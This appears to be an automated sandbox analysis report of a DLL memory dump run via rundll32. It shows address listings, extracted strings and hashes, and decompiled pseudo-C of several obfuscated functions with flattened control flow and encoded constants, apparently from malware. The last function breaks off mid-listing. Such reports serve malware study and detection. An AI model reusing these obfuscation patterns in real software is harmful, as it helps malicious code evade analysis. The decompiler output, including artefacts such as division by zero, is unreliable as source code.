0x1000bbd9
0x1000bbe6
0x1000bbeb
0x1000bbf3
0x1000bbf8
0x1000bc00
0x1000bc08
0x1000bc0d
0x1000bc15
0x1000bc24
0x1000bc27
0x1000bc2b
0x1000bc33
0x1000bc3b
0x1000bc43
0x1000bc48
0x1000bc50
0x1000bc58
0x1000bc60
0x1000bc68
0x1000bc70
0x1000bc80
0x1000bc84
0x1000bc88
0x1000bc89
0x1000bc90
0x1000bc94
0x1000bc9c
0x1000bca4
0x1000bca9
0x1000bcb1
0x1000bcb9
0x1000bcbe
0x1000bcc6
0x1000bcc6
0x1000bccc
0x1000bd5d
0x1000bd90
0x1000bd9f
0x1000bcd2
0x1000bcd8
0x1000bce9
0x1000bd12
0x1000bd1a
0x1000bd1f
0x1000bd24
0x1000bd26
0x00000000
0x1000bd26
0x1000bcda
0x1000bce0
0x00000000
0x1000bce2
0x1000bce2
0x00000000
0x1000bce2
0x1000bce0
0x1000bcd8
0x1000bda2
0x1000bdaa
0x1000bdaa
0x1000bd32
0x1000bd3c
0x1000bd41
0x1000bd4a
0x00000000
0x1000bd43
0x1000bd43
0x00000000
0x1000bd43
0x00000000
0x1000bd4f
0x1000bd4f
0x00000000

Strings

P#Sy, xrefs: 1000BC58
o]M, xrefs: 1000BC48
j, xrefs: 1000BAD6
S|, xrefs: 1000BC70
J5, xrefs: 1000BB1D
;, xrefs: 1000BADE
U, xrefs: 1000BCA9

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: U$;$J5$P#Sy$S|$o]M$j
API String ID: 0-1100184680
Opcode ID: 636a0e21c5a4ea879bfb2d8839fe7b0c22ca4155c6eee459cadcba9029d8c5f8
Instruction ID: aa41fc8afee8505ed3ff2e9e28d166a1d528a0746ba93f0ab596368142c471e6
Opcode Fuzzy Hash: 636a0e21c5a4ea879bfb2d8839fe7b0c22ca4155c6eee459cadcba9029d8c5f8
Instruction Fuzzy Hash: 319121721083409FE354CF65C98991BFBE1FBC9788F108A1DF19996260D7B6DA488F43

Uniqueness

Uniqueness Score: -1.00%

Function 1001BF69, Relevance: 8.9, Strings: 7, Instructions: 137
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1001BF69(signed int* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* __ecx;
				void* _t97;
				signed int _t103;
				signed int _t108;
				signed int _t117;
				signed int _t118;
				void* _t121;
				signed int* _t136;
				signed int* _t137;
				void* _t139;
				void* _t140;

				_t137 = _a12;
				_push(_t137);
				_push(_a8);
				_t136 = __edx;
				_push(_a4);
				_push(__edx);
				E10017B8C(_t97);
				_v104 = 0x3c7b;
				_t140 = _t139 + 0x14;
				_v104 = _v104 >> 4;
				_v104 = _v104 | 0x43682865;
				_t121 = 0x1c0941c6;
				_v104 = _v104 ^ 0x4368032d;
				_v84 = 0xa581;
				_t117 = 0x65;
				_v84 = _v84 / _t117;
				_v84 = _v84 ^ 0x00001947;
				_v96 = 0x47e0;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 << 0xb;
				_v96 = _v96 ^ 0x00001736;
				_v80 = 0xb12c;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 ^ 0x00001f90;
				_v100 = 0x7301;
				_v100 = _v100 | 0x41acea69;
				_v100 = _v100 << 4;
				_v100 = _v100 ^ 0x1acfcbfd;
				_a12 = 0x20aa;
				_a12 = _a12 >> 0xa;
				_a12 = _a12 | 0xfcc79f64;
				_a12 = _a12 << 0xf;
				_a12 = _a12 ^ 0xcfb609d8;
				_v88 = 0x70c2;
				_v88 = _v88 + 0x9226;
				_v88 = _v88 ^ 0x000120d6;
				_v76 = 0x7966;
				_t118 = 0x70;
				_v76 = _v76 * 0x7f;
				_v76 = _v76 ^ 0x003c0e5b;
				_v92 = 0x10a9;
				_v92 = _v92 * 0x62;
				_t103 = _v92;
				_t134 = _t103 % _t118;
				_v92 = _t103 / _t118;
				_v92 = _v92 ^ 0x000044d0;
				_v108 = 0x8b48;
				_v108 = _v108 + 0xfffff5f5;
				_v108 = _v108 >> 7;
				_v108 = _v108 >> 1;
				_v108 = _v108 ^ 0x00000081;
				do {
					while(_t121 != 0x630a276) {
						if(_t121 == 0xfb64cba) {
							_push(_t121);
							_t108 = E1000A0AD(_t137[1], _t134);
							 *_t137 = _t108;
							__eflags = _t108;
							if(__eflags != 0) {
								_t121 = 0x630a276;
								continue;
							}
						} else {
							if(_t121 == 0x1c0941c6) {
								_t121 = 0x2a7b7a84;
								 *_t137 =  *_t137 & 0x00000000;
								_t137[1] = _v108;
								continue;
							} else {
								if(_t121 == 0x2a7b7a84) {
									_t137[1] = E100026A0(_t136);
									_t121 = 0xfb64cba;
									continue;
								} else {
									if(_t121 == 0x36ea7767) {
										_t134 =  *_t136;
										E1001160B(_a12,  *_t136, _v88,  &_v72);
										_t140 = _t140 + 8;
										_t121 = 0x3864a759;
										continue;
									} else {
										_t147 = _t121 - 0x3864a759;
										if(_t121 != 0x3864a759) {
											goto L15;
										} else {
											E1001894D( &_v72, _v76, _t147, _v92,  &(_t136[1]));
										}
									}
								}
							}
						}
						L8:
						return 0 |  *_t137 != 0x00000000;
					}
					_t134 = _v96;
					E1001BC32( &_v72, _v96, _t137, _v80, _v100);
					_t140 = _t140 + 0xc;
					_t121 = 0x36ea7767;
					L15:
					__eflags = _t121 - 0xed1cfc2;
				} while (__eflags != 0);
				goto L8;
			}

0x1001bf6f
0x1001bf77
0x1001bf78
0x1001bf7f
0x1001bf81
0x1001bf88
0x1001bf8a
0x1001bf8f
0x1001bf97
0x1001bf9a
0x1001bfa1
0x1001bfa9
0x1001bfae
0x1001bfbb
0x1001bfc9
0x1001bfce
0x1001bfd4
0x1001bfdc
0x1001bfe4
0x1001bfe9
0x1001bfee
0x1001bff6
0x1001bffe
0x1001c003
0x1001c00b
0x1001c013
0x1001c01b
0x1001c020
0x1001c028
0x1001c033
0x1001c03b
0x1001c046
0x1001c04e
0x1001c059
0x1001c061
0x1001c069
0x1001c071
0x1001c07e
0x1001c07f
0x1001c083
0x1001c08b
0x1001c098
0x1001c09c
0x1001c0a0
0x1001c0a7
0x1001c0ab
0x1001c0b3
0x1001c0bb
0x1001c0c3
0x1001c0c8
0x1001c0cc
0x1001c0d4
0x1001c0d4
0x1001c0e2
0x1001c17c
0x1001c180
0x1001c185
0x1001c188
0x1001c18a
0x1001c18c
0x00000000
0x1001c18c
0x1001c0e8
0x1001c0ee
0x1001c167
0x1001c169
0x1001c16c
0x00000000
0x1001c0f0
0x1001c0f2
0x1001c156
0x1001c159
0x00000000
0x1001c0f4
0x1001c0fa
0x1001c137
0x1001c140
0x1001c145
0x1001c148
0x00000000
0x1001c0fc
0x1001c0fc
0x1001c102
0x00000000
0x1001c108
0x1001c118
0x1001c11e
0x1001c102
0x1001c0fa
0x1001c0f2
0x1001c0ee
0x1001c11f
0x1001c12d
0x1001c12d
0x1001c19f
0x1001c1a4
0x1001c1a9
0x1001c1ac
0x1001c1b1
0x1001c1b1
0x1001c1b1
0x00000000

Strings

gw6, xrefs: 1001C1AC
fy, xrefs: 1001C071
gw6, xrefs: 1001C0F4
N9$~, xrefs: 1001BF89
{<, xrefs: 1001BF8F
G, xrefs: 1001BFDC
e(hC, xrefs: 1001BFA1

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: N9$~$e(hC$fy$gw6$gw6${<$G
API String ID: 0-3456090699
Opcode ID: 58f62488f3dd0f3e0de2b5d3b2492f1e3d73fadc4139eb016a584664b31dba12
Instruction ID: 57fe1ad105d0b853462ff64503f95f13f98c5b77f94633ec5c2a211c653c8d70
Opcode Fuzzy Hash: 58f62488f3dd0f3e0de2b5d3b2492f1e3d73fadc4139eb016a584664b31dba12
Instruction Fuzzy Hash: 7C518771109345EFD358CF60C589A5FBBE1FBC8B48F504A1DF18A9A291C775DA48CB42

Uniqueness

Uniqueness Score: -1.00%

Function 10011494, Relevance: 8.9, Strings: 7, Instructions: 119
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E10011494() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v76;
				void* _t120;
				intOrPtr* _t145;
				intOrPtr _t148;
				void* _t153;
				void* _t154;

				_t154 = _t153 - 0x40;
				_v12 = 0x4a7b47;
				_v8 = 0;
				_v4 = 0;
				_v60 = 0xbe54;
				_v60 = _v60 ^ 0x798c4bc8;
				_v60 = _v60 >> 0xe;
				_v60 = _v60 ^ 0x00019760;
				_v36 = 0x6f0b;
				_v36 = _v36 << 6;
				_v36 = _v36 ^ 0x001bd80d;
				_v64 = 0x7379;
				_v64 = _v64 << 0xe;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 << 4;
				_v64 = _v64 ^ 0x000e02c1;
				_v48 = 0xed79;
				_v48 = _v48 << 4;
				_push(0x56);
				_push(0x1d);
				_v48 = _v48 / 0;
				_v48 = _v48 ^ 0x00006bba;
				_t145 = 0x1002140c;
				_v52 = 0x8c19;
				_v52 = _v52 + 0xffff0e50;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0fff9361;
				_v28 = 0xbf78;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 ^ 0x0000643e;
				_v32 = 0x993a;
				_v32 = _v32 ^ 0x2b268030;
				_v32 = _v32 ^ 0x2b266f96;
				_v44 = 0x1207;
				_v44 = _v44 + 0x1306;
				_v44 = _v44 / 0;
				_v44 = _v44 ^ 0x00005859;
				_v16 = 0x5e68;
				_v16 = _v16 | 0x5828b570;
				_v16 = _v16 ^ 0x5828a98e;
				_v20 = 0x9de1;
				_v20 = _v20 << 7;
				_v20 = _v20 ^ 0x004eeb79;
				_v24 = 0x7499;
				_v24 = _v24 ^ 0xd8e05a57;
				_v24 = _v24 ^ 0xd8e078a6;
				_v40 = 0x94e1;
				_v40 = _v40 + 0xde48;
				_v40 = _v40 >> 6;
				_v40 = _v40 ^ 0x00005f8f;
				_v56 = 0x32ae;
				_v56 = _v56 * 0x76;
				_v56 = _v56 << 0xb;
				_v56 = _v56 ^ 0xbae1a000;
				_t148 =  *0x1002140c; // 0x0
				while(_t148 != 0) {
					if( *((intOrPtr*)(_t148 + 0x18)) == 0) {
						L5:
						 *_t145 =  *((intOrPtr*)(_t148 + 0x2c));
						_t120 = E100033F4(_v16, _v20, _v24, _v40, _t148);
						_t154 = _t154 + 0xc;
					} else {
						_t120 = E1001A46E( *((intOrPtr*)(_t148 + 0x30)), _v60, 0, _v36);
						if(_t120 != _v56) {
							_t113 = _t148 + 0x2c; // 0x2c
							_t145 = _t113;
						} else {
							 *((intOrPtr*)(_t148 + 4))( *((intOrPtr*)(_t148 + 0x18)), 0, 0);
							E1001EEC8(_v76, _v60, _v64,  *((intOrPtr*)(_t148 + 0x18)));
							E1000ADFC(_v40, _v44,  *((intOrPtr*)(_t148 + 0x30)), _v56);
							_t154 = _t154 + 0x10;
							goto L5;
						}
					}
					_t148 =  *_t145;
				}
				return _t120;
			}

0x1001f022
0x1001f025
0x1001f035
0x1001f039
0x1001f03d
0x1001f045
0x1001f04d
0x1001f052
0x1001f05a
0x1001f062
0x1001f067
0x1001f06f
0x1001f077
0x1001f07c
0x1001f081
0x1001f086
0x1001f08e
0x1001f096
0x1001f0a1
0x1001f0a6
0x1001f0a8
0x1001f0ae
0x1001f0b6
0x1001f0bb
0x1001f0c3
0x1001f0cb
0x1001f0d0
0x1001f0d8
0x1001f0e0
0x1001f0e5
0x1001f0ed
0x1001f0f5
0x1001f0fd
0x1001f105
0x1001f10d
0x1001f11c
0x1001f120
0x1001f128
0x1001f130
0x1001f138
0x1001f140
0x1001f148
0x1001f14d
0x1001f155
0x1001f15d
0x1001f165
0x1001f16d
0x1001f175
0x1001f17d
0x1001f182
0x1001f18a
0x1001f197
0x1001f19b
0x1001f1a0
0x1001f1a8
0x1001f221
0x1001f1b3
0x1001f201
0x1001f209
0x1001f217
0x1001f21c
0x1001f1b5
0x1001f1c1
0x1001f1cc
0x1001f22d
0x1001f22d
0x1001f1ce
0x1001f1d3
0x1001f1e5
0x1001f1f9
0x1001f1fe
0x00000000
0x1001f1fe
0x1001f1cc
0x1001f21f
0x1001f21f
0x1001f22c

Strings

ys, xrefs: 1001F06F
h^, xrefs: 1001F128
G{J, xrefs: 1001F025
yN, xrefs: 1001F14D
>d, xrefs: 1001F0E5
y, xrefs: 1001F08E
YX, xrefs: 1001F120

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: >d$G{J$YX$h^$ys$y$yN
API String ID: 0-1280234317
Opcode ID: f577580e30a95b1878cf7faa76a5a2a1e9c9380d070f2c1a83d026053b02f95f
Instruction ID: c784112305cfe77906fd55e8e896b89539b782f47453e79b22c2f402f9e9ad07
Opcode Fuzzy Hash: f577580e30a95b1878cf7faa76a5a2a1e9c9380d070f2c1a83d026053b02f95f
Instruction Fuzzy Hash: 895114714083409FE359CF21C58940BBBF1FBD8798F608A0DF58A56260C7B5EA89CF86

Uniqueness

Uniqueness Score: -1.00%

Function 10010CE0, Relevance: 8.9, Strings: 7, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10010CE0() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				char* _t80;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				signed int _t101;
				short* _t104;
				signed int* _t106;

				_t106 =  &_v556;
				_v552 = 0x9e51;
				_v552 = _v552 | 0x5821e279;
				_t87 = 0xae164e2;
				_v552 = _v552 << 2;
				_t101 = 0x33;
				_v552 = _v552 / _t101;
				_v552 = _v552 ^ 0x01e48723;
				_v536 = 0xba18;
				_v536 = _v536 | 0xe87557f5;
				_v536 = _v536 ^ 0xe875bf60;
				_v524 = 0x5368;
				_v524 = _v524 >> 4;
				_v524 = _v524 ^ 0x000048f2;
				_v532 = 0x378a;
				_v532 = _v532 >> 0xf;
				_v532 = _v532 ^ 0x00006c0a;
				_v540 = 0xe24;
				_v540 = _v540 + 0x6d60;
				_v540 = _v540 ^ 0x000030f9;
				_v528 = 0xf25c;
				_v528 = _v528 << 3;
				_v528 = _v528 ^ 0x0007ce2c;
				_v544 = 0x4463;
				_v544 = _v544 << 4;
				_v544 = _v544 ^ 0x000401cb;
				_v548 = 0x9b2d;
				_v548 = _v548 << 9;
				_v548 = _v548 ^ 0x013618c6;
				L1:
				while(_t87 != 0xae164e2) {
					if(_t87 == 0x1332986a) {
						_push(_t87);
						_t80 = E1001B82F( &_v520, _v552, __eflags, _v536);
						_t87 = 0x290606b1;
						continue;
					}
					if(_t87 == 0x290606b1) {
						_v556 = 0x84d3;
						_v556 = _v556 | 0xc4b6d414;
						_v556 = _v556 << 6;
						_v556 = _v556 << 7;
						_v556 = _v556 ^ 0xda9ae002;
						_t82 = E1001D52C(_v524, _v532, _v540,  &_v520, _v528);
						_t106 =  &(_t106[3]);
						_t104 =  &_v520 + _t82 * 2;
						while(1) {
							_t80 =  &_v520;
							__eflags = _t104 - _t80;
							if(__eflags <= 0) {
								break;
							}
							__eflags =  *_t104 - 0x5c;
							if( *_t104 != 0x5c) {
								L10:
								_t104 = _t104 - 2;
								__eflags = _t104;
								continue;
							}
							_t71 =  &_v556;
							 *_t71 = _v556 - 1;
							__eflags =  *_t71;
							if( *_t71 == 0) {
								__eflags = _t104;
								L14:
								_t87 = 0x37fb1ba9;
								goto L1;
							}
							goto L10;
						}
						goto L14;
					}
					if(_t87 != 0x37fb1ba9) {
						L17:
						__eflags = _t87 - 0x502a11b;
						if(__eflags != 0) {
							continue;
						}
						return _t80;
					}
					_t83 =  *0x10021fd8; // 0x0
					return E1001103F(_v544, _v548, _t83 + 0x22c, _t104);
				}
				_t87 = 0x1332986a;
				goto L17;
			}

0x10010ce0
0x10010ce6
0x10010cf0
0x10010cf8
0x10010cfd
0x10010d0c
0x10010d19
0x10010d22
0x10010d2a
0x10010d32
0x10010d3a
0x10010d42
0x10010d4a
0x10010d4f
0x10010d57
0x10010d5f
0x10010d64
0x10010d6c
0x10010d74
0x10010d7c
0x10010d84
0x10010d8c
0x10010d91
0x10010d99
0x10010da1
0x10010da6
0x10010db2
0x10010dc2
0x10010dc7
0x00000000
0x10010dcf
0x10010ddd
0x10010e80
0x10010e8d
0x10010e94
0x00000000
0x10010e94
0x10010de5
0x10010e15
0x10010e21
0x10010e29
0x10010e2e
0x10010e33
0x10010e4c
0x10010e55
0x10010e58
0x10010e6c
0x10010e6c
0x10010e70
0x10010e72
0x00000000
0x00000000
0x10010e5d
0x10010e61
0x10010e69
0x10010e69
0x10010e69
0x00000000
0x10010e69
0x10010e63
0x10010e63
0x10010e63
0x10010e67
0x10010e76
0x10010e79
0x10010e79
0x00000000
0x10010e79
0x00000000
0x10010e67
0x00000000
0x10010e74
0x10010de9
0x10010e9d
0x10010e9d
0x10010ea3
0x00000000
0x00000000
0x00000000
0x10010ea3
0x10010def
0x00000000
0x10010e09
0x10010e9b
0x00000000

Strings

l, xrefs: 10010D64
y!X, xrefs: 10010CF0
d, xrefs: 10010CF8
d, xrefs: 10010DCF
`m, xrefs: 10010D74
hS, xrefs: 10010D42
cD, xrefs: 10010D99

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: l$`m$cD$hS$y!X$d$d
API String ID: 0-2731310073
Opcode ID: 1d7ee3b9f52636d895cd4f2fa697963edda1bf0f2587e9ba99f6fb2195d6b99b
Instruction ID: 55f197b7282085ee82ef909dac4a97ba288ab138da618c5bd2a4c62c0cb16d0f
Opcode Fuzzy Hash: 1d7ee3b9f52636d895cd4f2fa697963edda1bf0f2587e9ba99f6fb2195d6b99b
Instruction Fuzzy Hash: 404131716083019FE358CF25E48A41FBAE0FB84798F10892DF9D556250C3B4DA89CB86

Uniqueness

Uniqueness Score: -1.00%

Function 1000A7FA, Relevance: 8.8, Strings: 7, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1000A7FA(signed int __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v76;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				intOrPtr* _t151;
				intOrPtr _t154;
				intOrPtr _t156;
				void* _t161;
				void* _t162;

				_t132 = __ecx;
				_t154 =  *0x1002140c; // 0x0
				while(_t154 != 0) {
					if( *((intOrPtr*)(_t154 + 0x18)) != 0) {
						 *((intOrPtr*)(_t154 + 4))( *((intOrPtr*)(_t154 + 0x18)), 0xb, 0);
					}
					_t154 =  *((intOrPtr*)(_t154 + 0x2c));
				}
				_t133 = _t132 | 0xffffffff;
				_pop(_t155);
				_t162 = _t161 - 0x40;
				_v12 = 0x4a7b47;
				_t130 = _t133;
				_v8 = 0;
				_v4 = 0;
				_v60 = 0xbe54;
				_v60 = _v60 ^ 0x798c4bc8;
				_v60 = _v60 >> 0xe;
				_v60 = _v60 ^ 0x00019760;
				_v36 = 0x6f0b;
				_v36 = _v36 << 6;
				_v36 = _v36 ^ 0x001bd80d;
				_v64 = 0x7379;
				_v64 = _v64 << 0xe;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 << 4;
				_v64 = _v64 ^ 0x000e02c1;
				_v48 = 0xed79;
				_v48 = _v48 << 4;
				_t134 = 0x56;
				_v48 = _v48 / _t134;
				_v48 = _v48 ^ 0x00006bba;
				_t151 = 0x1002140c;
				_v52 = 0x8c19;
				_v52 = _v52 + 0xffff0e50;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0fff9361;
				_v28 = 0xbf78;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 ^ 0x0000643e;
				_v32 = 0x993a;
				_v32 = _v32 ^ 0x2b268030;
				_v32 = _v32 ^ 0x2b266f96;
				_v44 = 0x1207;
				_v44 = _v44 + 0x1306;
				_t135 = 0x1d;
				_v44 = _v44 / _t135;
				_v44 = _v44 ^ 0x00005859;
				_v16 = 0x5e68;
				_v16 = _v16 | 0x5828b570;
				_v16 = _v16 ^ 0x5828a98e;
				_v20 = 0x9de1;
				_v20 = _v20 << 7;
				_v20 = _v20 ^ 0x004eeb79;
				_v24 = 0x7499;
				_v24 = _v24 ^ 0xd8e05a57;
				_v24 = _v24 ^ 0xd8e078a6;
				_v40 = 0x94e1;
				_v40 = _v40 + 0xde48;
				_v40 = _v40 >> 6;
				_v40 = _v40 ^ 0x00005f8f;
				_v56 = 0x32ae;
				_v56 = _v56 * 0x76;
				_v56 = _v56 << 0xb;
				_v56 = _v56 ^ 0xbae1a000;
				_t156 =  *0x1002140c; // 0x0
				while(_t156 != 0) {
					if( *((intOrPtr*)(_t156 + 0x18)) == 0) {
						L10:
						 *_t151 =  *((intOrPtr*)(_t156 + 0x2c));
						_t124 = E100033F4(_v16, _v20, _v24, _v40, _t156);
						_t162 = _t162 + 0xc;
					} else {
						_t124 = E1001A46E( *((intOrPtr*)(_t156 + 0x30)), _v60, _t130, _v36);
						if(_t124 != _v56) {
							_t117 = _t156 + 0x2c; // 0x2c
							_t151 = _t117;
						} else {
							 *((intOrPtr*)(_t156 + 4))( *((intOrPtr*)(_t156 + 0x18)), 0, 0);
							E1001EEC8(_v76, _v60, _v64,  *((intOrPtr*)(_t156 + 0x18)));
							E1000ADFC(_v40, _v44,  *((intOrPtr*)(_t156 + 0x30)), _v56);
							_t162 = _t162 + 0x10;
							goto L10;
						}
					}
					_t156 =  *_t151;
				}
				return _t124;
			}

0x1000a7fa
0x1000a7fb
0x1000a816
0x1000a807
0x1000a810
0x1000a810
0x1000a813
0x1000a813
0x1000a81a
0x1000a81d
0x1001f022
0x1001f025
0x1001f033
0x1001f035
0x1001f039
0x1001f03d
0x1001f045
0x1001f04d
0x1001f052
0x1001f05a
0x1001f062
0x1001f067
0x1001f06f
0x1001f077
0x1001f07c
0x1001f081
0x1001f086
0x1001f08e
0x1001f096
0x1001f0a3
0x1001f0a8
0x1001f0ae
0x1001f0b6
0x1001f0bb
0x1001f0c3
0x1001f0cb
0x1001f0d0
0x1001f0d8
0x1001f0e0
0x1001f0e5
0x1001f0ed
0x1001f0f5
0x1001f0fd
0x1001f105
0x1001f10d
0x1001f119
0x1001f11c
0x1001f120
0x1001f128
0x1001f130
0x1001f138
0x1001f140
0x1001f148
0x1001f14d
0x1001f155
0x1001f15d
0x1001f165
0x1001f16d
0x1001f175
0x1001f17d
0x1001f182
0x1001f18a
0x1001f197
0x1001f19b
0x1001f1a0
0x1001f1a8
0x1001f221
0x1001f1b3
0x1001f201
0x1001f209
0x1001f217
0x1001f21c
0x1001f1b5
0x1001f1c1
0x1001f1cc
0x1001f22d
0x1001f22d
0x1001f1ce
0x1001f1d3
0x1001f1e5
0x1001f1f9
0x1001f1fe
0x00000000
0x1001f1fe
0x1001f1cc
0x1001f21f
0x1001f21f
0x1001f22c

Strings

ys, xrefs: 1001F06F
h^, xrefs: 1001F128
G{J, xrefs: 1001F025
yN, xrefs: 1001F14D
>d, xrefs: 1001F0E5
y, xrefs: 1001F08E
YX, xrefs: 1001F120

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: >d$G{J$YX$h^$ys$y$yN
API String ID: 0-1280234317
Opcode ID: 8c8e35ed602a4c362457924f3bdb3f6891687ced89e09ff81ce53943853880fe
Instruction ID: 1b2a13afe9e46cdc7ed96028d202d47331a3cfd1c9cdd2e9c98bbc93be0057c2
Opcode Fuzzy Hash: 8c8e35ed602a4c362457924f3bdb3f6891687ced89e09ff81ce53943853880fe
Instruction Fuzzy Hash: A641167140D3409BE359CF21C58910BBFF0FB94B98F508A0DF19A562A0C3B9DA89CF86

Uniqueness

Uniqueness Score: -1.00%

Function 100038E1, Relevance: 7.7, Strings: 6, Instructions: 247
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E100038E1() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t262;
				intOrPtr* _t268;
				intOrPtr _t272;
				intOrPtr* _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				void* _t281;
				void* _t310;
				signed int* _t314;

				_t314 =  &_v112;
				_v8 = 0x5f2aab;
				_v4 = 0;
				_v92 = 0x94a4;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x8ebe95f1;
				_v92 = _v92 + 0xffff36c7;
				_v92 = _v92 ^ 0x0e2968b9;
				_v84 = 0xaf21;
				_v84 = _v84 ^ 0x37666afe;
				_v84 = _v84 ^ 0x8ba222ea;
				_v84 = _v84 | 0x7b0288c6;
				_v84 = _v84 ^ 0xffc6eff5;
				_v68 = 0xb3a1;
				_v68 = _v68 + 0xb898;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x00001de9;
				_v96 = 0x96d2;
				_v12 = 0;
				_t310 = 0x302cd29f;
				_t274 = 3;
				_v96 = _v96 / _t274;
				_t275 = 0x63;
				_v96 = _v96 / _t275;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0x001077d7;
				_v100 = 0x7aa5;
				_v100 = _v100 >> 3;
				_v100 = _v100 << 4;
				_t276 = 0x1f;
				_v100 = _v100 * 0x26;
				_v100 = _v100 ^ 0x002433d9;
				_v104 = 0x95b4;
				_v104 = _v104 | 0x74084383;
				_v104 = _v104 / _t276;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x00018665;
				_v44 = 0xfce2;
				_v44 = _v44 + 0xd557;
				_t277 = 0x32;
				_v44 = _v44 * 0x48;
				_v44 = _v44 ^ 0x008315a9;
				_v88 = 0x4658;
				_v88 = _v88 / _t277;
				_v88 = _v88 >> 5;
				_v88 = _v88 ^ 0xa055e9aa;
				_v88 = _v88 ^ 0xa0559036;
				_v48 = 0x75fa;
				_v48 = _v48 ^ 0x07f0698f;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x001f85b1;
				_v36 = 0x2aff;
				_v36 = _v36 ^ 0x4412fe62;
				_v36 = _v36 ^ 0x4412b9fb;
				_v52 = 0xce1e;
				_v52 = _v52 ^ 0xd98e4b82;
				_v52 = _v52 + 0x6587;
				_v52 = _v52 ^ 0xd98ed045;
				_v56 = 0x810d;
				_v56 = _v56 ^ 0x20922d42;
				_v56 = _v56 ^ 0x2b614f25;
				_v56 = _v56 ^ 0x0bf38c25;
				_v60 = 0x42a1;
				_t278 = 0x67;
				_v60 = _v60 / _t278;
				_v60 = _v60 + 0xa282;
				_v60 = _v60 ^ 0x0000fdcd;
				_v64 = 0xd8d7;
				_v64 = _v64 + 0xb25f;
				_v64 = _v64 | 0x682bb30c;
				_v64 = _v64 ^ 0x682baae6;
				_v24 = 0x33b7;
				_v24 = _v24 + 0xffffe069;
				_v24 = _v24 ^ 0x00000a87;
				_v28 = 0x2343;
				_t279 = 0x69;
				_t271 = _v12;
				_v28 = _v28 * 0x7f;
				_v28 = _v28 ^ 0x00116da7;
				_v32 = 0xf4fa;
				_v32 = _v32 << 0xf;
				_v32 = _v32 ^ 0x7a7d5c6d;
				_v40 = 0x9fbb;
				_v40 = _v40 / _t279;
				_v40 = _v40 + 0xa372;
				_v40 = _v40 ^ 0x0000f205;
				_v108 = 0x1ed9;
